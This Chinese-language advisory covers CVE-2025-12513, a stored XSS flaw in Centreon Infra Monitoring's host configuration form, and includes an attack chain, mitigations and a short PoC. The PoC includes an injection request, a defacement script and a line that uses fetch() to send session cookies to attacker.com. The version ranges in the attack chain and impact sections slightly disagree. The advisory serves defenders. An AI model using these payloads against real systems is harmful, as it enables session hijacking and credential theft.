CVE-2025-12513 Centreon Infra Monitoring存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12513

漏洞类型

存储型XSS (Cross-site Scripting)

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Centreon Infra Monitoring (Hosts Configuration Form Modules)

漏洞概述

CVE-2025-12513是Centreon公司开发的Infra Monitoring组件中发现的存储型跨站脚本（Stored XSS）安全漏洞。该漏洞存在于Hosts配置表单模块中，由于应用程序未能对用户输入进行充分的输入验证和输出编码，攻击者可以在主机配置表单中注入恶意JavaScript代码。这些恶意代码会被永久存储在服务器端，当具有高权限的管理员或其他用户访问受影响页面时，恶意脚本会在其浏览器上下文中执行。攻击者可利用此漏洞窃取会话Cookie、劫持用户会话、进行钓鱼攻击或修改页面显示内容。由于该漏洞需要高权限用户触发，受影响范围相对有限，但仍需及时修复以防止潜在的安全风险。Centreon是一款广泛使用的开源网络、服务器和应用程序监控平台，在企业IT基础设施中部署广泛。

技术细节

该存储型XSS漏洞位于Centreon Infra Monitoring模块的主机配置表单处理逻辑中。漏洞的根本原因是应用程序在处理主机配置参数时，未对用户提交的输入进行适当的HTML实体编码或输入验证。攻击者（需具备高权限）可以在主机名称、别名、IP地址或其他配置字段中注入恶意JavaScript代码，如：<script>alert(document.cookie)</script>。当数据存储到数据库后，每次有用户访问该主机配置详情页面时，恶意脚本会以HTML输出形式返回到用户浏览器中执行。由于攻击代码存储在服务器端，这种XSS攻击具有持久性危害。CVSS 3.1向量显示攻击复杂度低（AC:L），攻击向量为网络（AV:N），但需要高权限（PR:H）才能利用。虽然该漏洞不影响数据完整性和可用性（I:N, A:N），但对机密性有高影响（C:H），攻击者可能通过窃取管理员会话令牌获取系统控制权。修复版本已在25.10.2、24.10.15和24.04.19中发布，主要通过增加输入验证和输出编码来缓解此漏洞。

攻击链分析

STEP 1

信息收集

攻击者首先识别目标Centreon实例版本，确认其属于受影响版本范围（24.04.0-24.04.19、24.10.0-24.10.14、25.10.0-25.10.1）

STEP 2

获取高权限账户

攻击者需要获取Centreon的高权限账户（如管理员或具有主机配置权限的用户账户），可通过社会工程学、凭证填充或其他方式获取

STEP 3

注入恶意脚本

使用高权限账户登录Centreon，进入Infra Monitoring模块的主机配置表单，在主机名称、别名或其他输入字段中注入恶意JavaScript代码

STEP 4

持久化存储

提交表单后，恶意脚本被存储在数据库中，成为主机的永久配置数据

STEP 5

触发执行

当其他管理员或用户访问该主机配置详情页面时，存储的恶意脚本被从数据库取出并在用户浏览器中执行

STEP 6

窃取敏感信息

恶意脚本执行后，可窃取用户会话Cookie、劫持会话、进行钓鱼攻击或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-12513 Stored XSS PoC for Centreon Infra Monitoring -->
<!-- This PoC demonstrates the XSS vulnerability in Hosts Configuration Form -->

<!-- Step 1: Inject malicious JavaScript via Host Name field -->
<script>alert(document.cookie)</script>

<!-- Step 2: More advanced payload for session hijacking -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Step 3: Stored XSS payload for defacement -->
<div style="display:none"><script>document.body.innerHTML='<h1>Hacked</h1>'</script></div>

<!-- Example HTTP POST request to trigger the vulnerability -->
<!-- POST /centreon/main.php?p=60001&o=a HTTP/1.1 -->
<!-- Host: centreon-server -->
<!-- Content-Type: application/x-www-form-urlencoded -->
<!-- -->
<!-- host_name=<script>alert(document.cookie)</script>&host_alias=test&host_address=192.168.1.100&submit=Save

影响范围

Centreon 25.10.0 - 25.10.1

Centreon 24.10.0 - 24.10.14

Centreon 24.04.0 - 24.04.18

防御指南

临时缓解措施

立即将Centreon升级到修复版本（25.10.2、24.10.15或24.04.19）。如果无法立即升级，可采取以下临时措施：限制主机配置功能的管理员访问权限，仅允许受信任的管理员操作；对所有主机配置输入进行严格的输入过滤和验证；启用内容安全策略（CSP）响应头以减少XSS攻击影响；监控和审计主机配置相关的操作日志，及时发现异常行为；在Web应用防火墙（WAF）上配置XSS防护规则，拦截恶意请求。建议尽快完成升级以消除安全风险。